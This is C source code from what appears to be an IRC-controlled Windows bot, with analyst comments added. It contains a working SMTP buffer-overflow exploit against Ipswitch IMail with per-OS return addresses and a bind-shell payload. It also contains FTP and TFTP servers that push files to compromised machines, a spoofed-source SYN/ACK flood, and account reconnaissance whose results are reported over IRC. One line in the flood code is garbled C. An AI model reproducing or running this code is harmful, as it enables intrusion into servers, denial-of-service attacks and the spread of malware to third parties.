 * Analyst notes (from the code only): observable SMTP artefacts are an
 * "EHLO " with an empty host name, "MAIL FROM <TEST@TEST>", and a RCPT TO
 * argument several hundred bytes long that is mostly non-printable and
 * ends in "SSS>"; a follow-up TCP connection to port 6236 on the same host
 * indicates the payload was reached.  The return value is effectively
 * only FALSE on the early-exit paths; the success path never returns.
 */
unsigned int __stdcall ipswitch_exploit(void *param, char *target, const char *host)
{
    struct exploits exploit = *(struct exploits *)param;
    struct exploits *pexploit = (struct exploits *)param;
    pexploit->gotinfo = true;

    static char overflow[1028];
    WSADATA wsaData;
    struct hostent *hp;
    struct sockaddr_in sockin;
    char buf[300], *check;
    int sockfd, bytes;
    int plen, i;

    //JMP = atoi("1");

    if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) {
        //fprintf(stderr, "Error setting up with WinSock v1.1\n");
        return false;
    }

    hp = gethostbyname(host);
    if (hp == NULL) {
        //printf("ERROR: Uknown host %s\n", exploit.ip);
        //printf("%s",exploit.ip);
        return false;
    }

    sockin.sin_family = hp->h_addrtype;
    sockin.sin_port = htons(exploit.port);
    sockin.sin_addr = *((struct in_addr *)hp->h_addr);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) {
        //printf("ERROR: Socket Error\n");
        return false;
    }
    if ((connect(sockfd, (struct sockaddr *) &sockin,sizeof(sockin))) == SOCKET_ERROR) {
        //printf("ERROR: Connect Error\n");
        closesocket(sockfd);
        WSACleanup();
        return false;;
    }
    if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) {
        //printf("ERROR: Recv Error\n");
        closesocket(sockfd);
        WSACleanup();
        return false;
    }

    /* wait for SMTP service welcome */
    buf[bytes] = '\0';
    check = strstr(buf, "220");
    if (check == NULL) {
        //printf("ERROR: NO response from SMTP service\n");
        closesocket(sockfd);
        WSACleanup();
        return false;
    }

    // JMP to EAX = Results in a Corrupted Stack
    // so instead we POP EBP, RET to restore pointer and then return
    // this causes code procedure to continue
    /*
       ['IMail 8.x Universal', 0x10036f71 ],
       ['Windows 2003 SP1 English', 0x7c87d8af ],
       ['Windows 2003 SP0 English', 0x77d5c14c ],
       ['Windows XP SP2 English', 0x7c967e23 ],
       ['Windows XP SP1 English', 0x71ab389c ],
       ['Windows XP SP0 English', 0x71ab389c ],
       ['Windows 2000 Universal English', 0x75021397 ],
       ['Windows 2000 Universal French', 0x74fa1397],
       ['Windows XP SP1 - SP2 German', 0x77d18c14],
    */
    char Exp[] = "RCPT TO: <@"; // This stores our JMP between the @ and :
    char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:"; //Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
    char WinXPSP2E[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23
    char IMail815[] = "\x71\x6f\x03\x10:"; //IMAIL 8.15 SMTPDLL.DLL [pop ebp, ret] 0x10036f71
    char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:"; //Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c
    char WinXPSP2[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23
    char WinXPSP1[] = "\x9c\x38\xab\x71:"; //WinXP SP1 and 0 English U32 [pop ebp, ret]0x71ab389c
    char Win2KE[] = "\x97\x31\x02\x75:"; //Win2k English All SPs [pop ebp, ret]0x75021397
    char Win2KF[] = "\x97\x13\xfa\x74:"; // As above except French Win2k [pop ebp, ret]0x74fa1397
    char WinXPG[] = "\x14\x8c\xd1\x77:"; //WinXP SP1 - SP2 German U32 [pop ebp, ret]0x77d18c14
    char tail[] = "SSS>\n"; // This closes the RCPT cmd. Any characters work.
    // Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems
    // After around 560 bytes or so EIP gets overwritten. But this method is easier to exploit and it works
    // On all versions from 8.x to 2006 (9.x?)
    char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44"; // Stabolize Stack prior to payload.

    memset(overflow, 0, 1028);
    strcat(overflow, Exp);
    strcat(overflow, IMail815);
    strcat(overflow, Win2k3SP1E);
    strcat(overflow, WinXPSP1);
    strcat(overflow, Win2KE);
    /* pad so that StackS + payload end at a fixed offset */
    plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
    for (i=0; i<plen; i++){
        strcat(overflow, "\x90");
    }
    strcat(overflow, StackS);
    strcat(overflow, Win32Bind);
    // Dont forget to add the trailing characters to set up stack overflow
    strcat(overflow, tail);

    // Connect to SMTP Server and Setup Up Email
    char EHLO[] = "EHLO \r\n";
    char MF[] = "MAIL FROM <TEST@TEST> \r\n";
    send(sockfd, EHLO, strlen(EHLO), 0);
    Sleep(1000);
    send(sockfd, MF, strlen(MF), 0);
    Sleep(1000);
    if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR) {
        //printf("ERROR: Send Error\n");
        closesocket(sockfd);
        WSACleanup();
        return false;
    }
    closesocket(sockfd);
    WSACleanup();
    Sleep(1000);
    closesocket(sockfd);

    /* second connection: only checks that the service still answers */
    sockin.sin_family = hp->h_addrtype;
    sockin.sin_port = htons(exploit.port);
    sockin.sin_addr = *((struct in_addr *)hp->h_addr);
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) {
        return false;
    }
    if ((connect(sockfd, (struct sockaddr *) &sockin,sizeof(sockin))) == SOCKET_ERROR) {
        closesocket(sockfd);
        WSACleanup();
    }
    if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) {
        closesocket(sockfd);
        WSACleanup();
    }
    buf[bytes] = '\0';
    check = strstr(buf, "220");
    if (check == NULL) {
        closesocket(sockfd);
        WSACleanup();
    }
    closesocket(sockfd);
    WSACleanup();

    shell_connect(exploit.ip, 6236);
    {
        irc_privmsg(target, "Exploiting IP: %s", exploit.ip);
        closesocket(sockfd);
        _endthreadex(0);
        return true;
    }
    return false;
}
/*
 * Report which of the dynamically loaded system DLLs failed to load at
 * start-up.  Each no<dll> flag (set elsewhere at load time) produces a
 * "<Dll>.dll failed. <err>" line carrying the matching no<dll>err code;
 * these lines are sent regardless of `silent`.  The closing "[MAIN]: DLL
 * test complete." line honours `silent` and is always logged.
 * Avicap32 is only checked when NO_CAPTURE is not defined.
 */
void CheckDLLs(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
    char sendbuf[IRCLINE];

    if (nokernel32) { sprintf(sendbuf,"Kernel32.dll failed. <%d>", nokernel32err); irc_privmsg(sock, chan, sendbuf, notice); }
    if (nouser32) { sprintf(sendbuf,"User32.dll failed. <%d>", nouser32err); irc_privmsg(sock, chan, sendbuf, notice); }
    if (noadvapi32) { sprintf(sendbuf,"Advapi32.dll failed. <%d>", noadvapi32err); irc_privmsg(sock, chan, sendbuf, notice); }
    if (nogdi32) { sprintf(sendbuf,"Gdi32.dll failed. <%d>", nogdi32err); irc_privmsg(sock, chan, sendbuf, notice); }
    if (nows2_32) { sprintf(sendbuf,"Ws2_32.dll failed. <%d>", nows2_32err); irc_privmsg(sock, chan, sendbuf, notice); }
    if (nowininet) { sprintf(sendbuf,"Wininet.dll failed. <%d>", nowinineterr); irc_privmsg(sock, chan, sendbuf, notice); }
    if (noicmp) { sprintf(sendbuf,"Icmp.dll failed. <%d>", noicmperr); irc_privmsg(sock, chan, sendbuf, notice); }
    if (nonetapi32) { sprintf(sendbuf,"Netapi32.dll failed. <%d>", nonetapi32err); irc_privmsg(sock, chan, sendbuf, notice); }
    if (nodnsapi) { sprintf(sendbuf,"Dnsapi.dll failed. <%d>", nodnsapierr); irc_privmsg(sock, chan, sendbuf, notice); }
    if (noiphlpapi) { sprintf(sendbuf,"Iphlpapi.dll failed. <%d>", noiphlpapierr); irc_privmsg(sock, chan, sendbuf, notice); }
    if (nompr) { sprintf(sendbuf,"Mpr32.dll failed. <%d>", nomprerr); irc_privmsg(sock, chan, sendbuf, notice); }
    if (noshell32) { sprintf(sendbuf,"Shell32.dll failed. <%d>", noshell32err); irc_privmsg(sock, chan, sendbuf, notice); }
    if (noodbc32) { sprintf(sendbuf,"Odbc32.dll failed. <%d>", noodbc32err); irc_privmsg(sock, chan, sendbuf, notice); }
#ifndef NO_CAPTURE
    if (noavicap32) { sprintf(sendbuf,"Avicap32.dll failed. <%d>", noavicap32err); irc_privmsg(sock, chan, sendbuf, notice); }
#endif

    sprintf(sendbuf,"[MAIN]: DLL test complete.");
    if (!silent) irc_privmsg(sock, chan, sendbuf, notice);
    addlog(sendbuf);
    return;
}
/*
 * Minimal fake FTP server used to hand ftp.filename to a remote machine.
 * Listens on a random port (FTP_PORT = brandom(1030,65200)) on all
 * interfaces, accepts any USER/PASS, answers a fixed set of commands, and
 * on RETR opens an active-mode data connection back to the address/port
 * given by the client's PORT command (ftp_Data_connect + Ftp_data_transfer),
 * then reports "[ROOTED]: ..." on IRC and in the log.  select()-driven,
 * single-threaded, loops until select() fails.  Returns 1 on exit paths.
 *
 * Analyst notes (all from the literals below): the banner is
 * "220 NzmxFtpd 0wns j0", SYST answers "215 NzmxFtpd", QUIT answers
 * "221 Goodbye happy r00ting." — all three are fixed, searchable strings.
 * PASV is refused, so the transfer is always an outbound connection from
 * this host to the client's PORT address.  Input handling is weak: the
 * PORT parser scans unbounded "%[^,]" fields into 4- and 50-byte arrays,
 * and buf is not guaranteed NUL-terminated before sscanf().
 */
DWORD WINAPI ftpd(LPVOID pParam)
{
    WSADATA wsdata;
    SOCKET listener;
    SOCKET newfd;
    char sendbuf[IRCLINE];
    struct sockaddr_in server_address;
    struct sockaddr_in remoteaddr;
    long h;
    int reuse_addr = 1;
    unsigned long mode = 1;
    int fdmax;
    int i;
    int addrlen;
    int nbytes;
    char buf[100];
    // char t_buf[1024];
    char tmpbuf[100];
    char tmpbuf2[100];
    char a[4];
    char b[4];
    char c[4];
    char d[4];
    char p1[50];
    char p2[50];
    char tmpip[15];
    int po,po2;
    FTP ftp = *((FTP *)pParam);
    FTP *ftps = (FTP *)pParam;
    ftps->gotinfo = TRUE;
    struct fd_set master;   // master file descriptor list
    struct fd_set read_fds; // temp file descriptor list for select()

    FD_ZERO(&master);       // clear the master and temp sets
    FD_ZERO(&read_fds);
    WSAStartup(0x0101, &wsdata);
    srand(time(NULL));
    FTP_PORT = brandom(1030,65200);

    listener = socket(AF_INET, SOCK_STREAM, 0);
    setsockopt(listener, SOL_SOCKET, SO_REUSEADDR, (char*)&reuse_addr,sizeof(reuse_addr));
    ioctlsocket(listener, FIONBIO, &mode);   /* non-blocking listener */
    server_address.sin_family = AF_INET;
    server_address.sin_addr.s_addr = INADDR_ANY;
    server_address.sin_port = htons(FTP_PORT);
    if (bind(listener, (struct sockaddr *) &server_address,sizeof(server_address)) < 0 ) {
        return 1;
    }
    listen(listener,10);
    FD_SET(listener, &master);
    fdmax = listener;

    while(1) {
        read_fds = master;
        if (select(fdmax+1, &read_fds, NULL, NULL, NULL) == -1) {
            return 1;
        }
        for(i = 0; i <= fdmax; i++) {
            memset(buf,0,sizeof(buf));
            memset(tmpbuf,0,sizeof(tmpbuf));
            if (FD_ISSET(i, &read_fds)) {
                if (i == (int)listener) {
                    /* new control connection: greet it */
                    addrlen = sizeof(remoteaddr);
                    if ((newfd = accept(listener, (struct sockaddr *)&remoteaddr,&addrlen)) != -1) {
                        FD_SET(newfd, &master);
                        if ((int)newfd > fdmax) {
                            fdmax = newfd;
                        }
                        send(newfd, "220 NzmxFtpd 0wns j0\n",21 , 0);
                    }
                } else {
                    if ((nbytes = recv(i, buf, sizeof(buf), 0)) <= 0) {
                        FD_CLR(i, &master);
                        closesocket(i);
                    } else {
                        /* command word and first argument */
                        sscanf(buf,"%s %s",tmpbuf,tmpbuf2);
                        if (strcmp(tmpbuf,"USER") == 0) {
                            send(i,"331 Password required\n",22 , 0);
                        } else if (strcmp(tmpbuf,"PASS") == 0) {
                            send(i,"230 User logged in.\n",20 , 0);
                        } else if (strcmp(tmpbuf,"SYST") == 0) {
                            send(i,"215 NzmxFtpd\n",13 , 0);
                        } else if (strcmp(tmpbuf,"REST") == 0) {
                            send(i,"350 Restarting.\n",16 , 0);
                        } else if (strcmp(tmpbuf,"PWD") == 0) {
                            send(i,"257 \"/\" is current directory.\n",30 , 0);
                        } else if ((strcmp(tmpbuf,"TYPE") == 0) && (strcmp(tmpbuf2,"A") == 0)) {
                            send(i,"200 Type set to A.\n",19 , 0);
                        } else if ((strcmp(tmpbuf,"TYPE") == 0) && (strcmp(tmpbuf2,"I") == 0)) {
                            send(i,"200 Type set to I.\n",19 , 0);
                        } else if (strcmp(tmpbuf,"PASV") == 0) {
                            char pasv[] = "425 Passive not supported on this server\n";
                            send(i, pasv, strlen(pasv), 0);
                        } else if (strcmp(tmpbuf,"LIST") == 0) {
                            char list[] = "226 Transfer complete\n";
                            send(i, list, strlen(list), 0);
                        } else if (strcmp(tmpbuf,"PORT") == 0) {
                            /* PORT a,b,c,d,p1,p2 -> tmpip and data port h */
                            sscanf(buf,"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]",a,b,c,d,p1,p2);
                            po = atoi(p1);
                            po2 = atoi(p2);
                            memset(p1,0,sizeof(p1));
                            sprintf(p1,"%x%x\n",po,po2);
                            h = strtoul(p1, NULL, 16);
                            sprintf(tmpip,"%s.%s.%s.%s",a,b,c,d);
                            send(i,"200 PORT command successful.\n",29 , 0);
                        } else if (strcmp(tmpbuf,"RETR") == 0) {
                            send(i,"150 Opening BINARY mode data connection\n",40 , 0);
                            if(ftp_Data_connect(tmpip,(int)h) == 1) {
                                if (Ftp_data_transfer() == 1) {
                                    send(i,"226 Transfer complete.\n",23 , 0);
                                    sprintf(sendbuf,"4<<12[ROOTED]: %s, port:%d now executing %s on remote machine.4>>",tmpip,FTP_PORT,ftp.filename);
                                    if (!ftp.silent) irc_privmsg(ftp.sock,ftp.chan,sendbuf,ftp.notice);
                                    addlog(sendbuf);
                                }
                            } else {
                                send(i,"425 Can't open data connection.\n",32,0);
                            }
                        } else if (strcmp(tmpbuf,"QUIT") == 0) {
                            send(i,"221 Goodbye happy r00ting.\n",27 , 0);
                        }
                        memset(buf,0,sizeof(buf));
                    }
                }
            }
        }
    }
    return 1;
}
/*
 * Single-file TFTP read server used to hand tftp.filename to a remote
 * machine.  Binds UDP tftp.port on all interfaces; if the bind fails it
 * sleeps 5 s and restarts itself by recursion.  Serves one RRQ whose file
 * name is tftp.requestname in "octet" mode with BLOCKSIZE-byte DATA blocks,
 * reading the next block from the file on every ACK; any other request gets
 * an ERROR packet.  When the transfer ends (a short/empty block) the socket
 * and file are closed and, unless the spawner has cleared gotinfo, the
 * server restarts itself to serve the next client.
 *
 * Analyst notes (from the literals below): the "file not found" reply is a
 * standard code-1 ERROR packet with text "File Not Found"; the reply to any
 * unsupported opcode is a code-4 ERROR whose text is "kthx"
 * (\x6B\x74\x68\x78) — a distinctive, searchable string.  IRC lines are
 * prefixed "[TFTP]:".  Every restart is a recursive call, so a long-lived
 * server grows the stack with each served client.  sprintf(IP, ...) and
 * the error-log sprintf use a non-literal format / a 128-byte buffer.
 */
DWORD WINAPI tftpserver(LPVOID param)
{
    FILE *fp;
    char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18];
    int err=1;
    TFTP tftp = *((TFTP *)param);
    TFTP *tftps = (TFTP *)param;
    tftps->gotinfo = TRUE;
    tftp.threads++;

    SOCKET ssock;
    if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {
        Sleep(400);
        sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
        if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
        addlog(sendbuf);
        clearthread(tftp.threadnum);
        ExitThread(0);
    }
    threads[tftp.threadnum].sock=ssock;

    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family = AF_INET;
    ssin.sin_port = fhtons((unsigned short)tftp.port);
    ssin.sin_addr.s_addr = INADDR_ANY;
    if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) {
        /* port busy: back off and try again (recursively) */
        Sleep(5000);
        tftp.threads--;
        return tftpserver(param);
    }

    if ((fp=fopen(tftp.filename, "rb")) == NULL) {
        Sleep(400);
        sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename);
        irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
        addlog(sendbuf);
        clearthread(tftp.threadnum);
        ExitThread(0);
    }

    /* err holds the last fread() size; 0 means the final block went out */
    while(err>0 && tftps->gotinfo && fp) {
        TIMEVAL timeout;
        timeout.tv_sec=5;
        timeout.tv_usec=5000;
        fd_set fd;
        FD_ZERO(&fd);
        FD_SET(ssock,&fd);
        memset(buffer,0,sizeof(buffer));
        if(fselect(0,&fd,NULL,NULL,&timeout) > 0) {
            SOCKADDR_IN csin;
            int csin_len=sizeof(csin);
            char f_buffer[BLOCKSIZE+4]="";
            err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len);
            sprintf(IP,finet_ntoa(csin.sin_addr));
            // parse buffer
            if(buffer[0]==0 && buffer[1]==1) { //RRQ
                char *tmprequest=buffer,*tmptype=buffer;
                tmprequest+=2; //skip the opcode
                tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL
                if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) {
                    /* ERROR opcode 5, code 1, "File Not Found" */
                    fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len);
                    // for loop to add a \0 to the end of the requestname
                    sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname);
                    addlog(buffer);
                } else {
                    // good rrq packet: send first data packet
                    fseek(fp, 0, SEEK_SET);
                    f_buffer[0]=0; f_buffer[1]=3; // DATA
                    f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK #
                    err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
                    fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
                    sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename);
                    if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
                    addlog(sendbuf);
                }
            } else if(buffer[0]==0 && buffer[1]==4) { // ACK
                // send next packet
                unsigned int blocks;
                BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK #
                f_buffer[0]=0; f_buffer[1]=3; // DATA
                if (b2==255) { // DATA BLOCK #
                    f_buffer[2]=++b1; f_buffer[3]=b2=0;
                } else {
                    f_buffer[2]=b1; f_buffer[3]=++b2;
                }
                blocks=(b1 * 256) + b2 - 1; // remember to subtract 1 as the ACK block # is 1 more than the actual file block #
                fseek(fp, blocks * BLOCKSIZE, SEEK_SET);
                err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
                fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
                if (err==0) {
                    sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s (%s).",IP,tftp.filename);
                    if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
                    addlog(sendbuf);
                }
            } else { // we dont support any other commands
                /* ERROR opcode 5, code 4, text "kthx" */
                fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len);
            }
        } else continue;
    }

    // check for ack, then msg irc on transfer complete
    fclosesocket(ssock);
    fclose(fp);
    tftp.threads--;
    if(tftps->gotinfo == FALSE) {
        clearthread(tftp.threadnum);
        ExitThread(0);
    }
    Sleep(1000);
    return tftpserver(param);
}
/*
 * Thread entry for the raw-socket TCP flood ("tcp" command).  Copies the
 * TCPFLOOD block, acknowledges via gotinfo, opens a SOCK_RAW/IPPROTO_RAW
 * socket with IP_HDRINCL, validates tcpflood.ip, then for tcpflood.time
 * seconds builds and sends one hand-made IP+TCP packet per iteration.
 * The flag type comes from tcpflood.type ("syn", "ack" or "random");
 * the source address is random when tcpflood.spoof is set, else this
 * host's.  On completion (or a sendto() failure) the packet count and
 * derived rates are reported to IRC and the log.  Never returns.
 *
 * Analyst notes (field values fixed in the code below, useful as a
 * signature of this generator): IP ident 1, TTL 128, no fragmentation,
 * TCP sequence always 0x12345678, window 512, source port and (when
 * tcpflood.port is 0) destination port drawn from rand()%1025, a 60-byte
 * datagram (szSendBuf) with 20 zero bytes after the TCP header, and an
 * ack_seq of 0..2 in "random" mode.  Sending raw IP with IP_HDRINCL
 * requires administrative rights on the host.  For a type string that
 * matches none of the three, tcpHeader.flags/ack_seq are left
 * uninitialised (stack values).
 */
DWORD WINAPI TcpFloodThread(LPVOID param)
{
    TCPFLOOD tcpflood = *((TCPFLOOD *)param);
    TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
    tcpfloods->gotinfo = TRUE;

    char sendbuf[IRCLINE], szSendBuf[60]={0};
    IPHEADER ipHeader;
    TCPHEADER tcpHeader;
    PSDHEADER psdHeader;

    srand(GetTickCount());

    SOCKET ssock;
    if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
        sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
        if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
        addlog(sendbuf);
        clearthread(tcpflood.threadnum);
        ExitThread(0);
    }

    BOOL flag = TRUE;
    if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
        sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
        if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
        addlog(sendbuf);
        clearthread(tcpflood.threadnum);
        ExitThread(0);
    }

    if (finet_addr(tcpflood.ip) == INADDR_NONE) {
        sprintf(sendbuf,"[TCP]: Invalid target IP.");
        if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
        addlog(sendbuf);
        clearthread(tcpflood.threadnum);
        ExitThread(0);
    }

    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family=AF_INET;
    ssin.sin_port=fhtons(0);
    ssin.sin_addr.s_addr=finet_addr(tcpflood.ip);

    int sent = 0;
    unsigned long start = GetTickCount();
    while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
        /* IP header: version 4, IHL in 32-bit words, fixed ident/TTL */
        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
        ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
        ipHeader.ident=1;
        ipHeader.frag_and_flags=0;
        ipHeader.ttl=128;
        ipHeader.proto=IPPROTO_TCP;
        ipHeader.checksum=0;
        ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
        ipHeader.destIP=ssin.sin_addr.s_addr;

        /* TCP header: random low ports, constant sequence number */
        ((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port)));
        tcpHeader.sport=fhtons((unsigned short)(rand()%1025));
        tcpHeader.seq=fhtonl(0x12345678);
        if (strstr(tcp flood_type_placeholder_never_used,"")) {}
        if (strstr(tcpflood.type,"syn")) {
            tcpHeader.ack_seq=0;
            tcpHeader.flags=SYN;
        } else if (strstr(tcpflood.type,"ack")) {
            tcpHeader.ack_seq=0;
            tcpHeader.flags=ACK;
        } else if (strstr(tcpflood.type,"random")) {
            tcpHeader.ack_seq=rand()%3;
            ((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
        }
        tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
        tcpHeader.window=fhtons(512);
        tcpHeader.urg_ptr=0;
        tcpHeader.checksum=0;

        /* pseudo-header + TCP header -> TCP checksum */
        psdHeader.saddr=ipHeader.sourceIP;
        psdHeader.daddr=ipHeader.destIP;
        psdHeader.zero=0;
        psdHeader.proto=IPPROTO_TCP;
        psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader)));
        memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
        memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
        tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));

        /* real IP header + TCP header -> IP checksum, then the final buffer */
        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
        ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

        if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
            fclosesocket(ssock);
            _snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
            if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
            addlog(sendbuf);
            clearthread(tcpflood.threadnum);
            ExitThread(0);
        }
        sent++;
    }

    fclosesocket(ssock);
    sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
    if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
    addlog(sendbuf);
    clearthread(tcpflood.threadnum);
    ExitThread(0);
}
/*
 * Looks up one account with NetUserGetInfo() at information level 11 and
 * posts every field of the USER_INFO_11 record, one line at a time, to the
 * IRC channel (account reconnaissance on the host or on ServerName).
 *
 * ServerName / Username are narrow strings converted with AsWideString().
 * Returns the NET_API_STATUS from NetUserGetInfo(); on failure a single
 * "net user info error" line carrying the status code is posted instead.
 * The API buffer is released with NetApiBufferFree() on both paths.
 *
 * Note: the wide strings returned by AsWideString() are never released
 * here; whether that is a leak depends on AsWideString(), which is not
 * visible in this file section.
 */
NET_API_STATUS UserInfo(char *ServerName, char *Username, SOCKET sock, char *chan, BOOL notice)
{
    char buffer[IRCLINE], *user_priv;
    LPUSER_INFO_11 pBuf = NULL;
    DWORD dwLevel = 11;
    LPWSTR wServerName = (LPWSTR)AsWideString(ServerName);
    LPWSTR wUsername = (LPWSTR)AsWideString(Username);
    NET_API_STATUS nStatus = fNetUserGetInfo(wServerName,wUsername,dwLevel,(LPBYTE *)&pBuf);
    if (nStatus == NERR_Success) {
        if (pBuf != NULL) {
            // %S formats the wide-character fields of USER_INFO_11
            sprintf(buffer,"Account: %S",pBuf->usri11_name);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Full Name: %S",pBuf->usri11_full_name);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"User Comment: %S",pBuf->usri11_usr_comment);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Comment: %S",pBuf->usri11_comment);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            // map the privilege enum to a label
            switch(pBuf->usri11_priv) {
                case USER_PRIV_GUEST:
                    user_priv = TEXT("Guest");
                    break;
                case USER_PRIV_USER:
                    user_priv = TEXT("User");
                    break;
                case USER_PRIV_ADMIN:
                    user_priv = TEXT("Administrator");
                    break;
                default:
                    user_priv = TEXT("Unknown");
                    break;
            }
            sprintf(buffer,"Privilege Level: %s",user_priv);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Auth Flags: %d",pBuf->usri11_auth_flags);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Home Directory: %S",pBuf->usri11_home_dir);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Parameters: %S",pBuf->usri11_parms);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Password Age: %d",pBuf->usri11_password_age);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Bad Password Count: %d",pBuf->usri11_bad_pw_count);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Number of Logins: %d",pBuf->usri11_num_logons);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            // logon/logoff are printed as raw integers, not formatted times
            sprintf(buffer,"Last Logon: %d",pBuf->usri11_last_logon);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Last Logoff: %d",pBuf->usri11_last_logoff);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Logon Server: %S",pBuf->usri11_logon_server);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
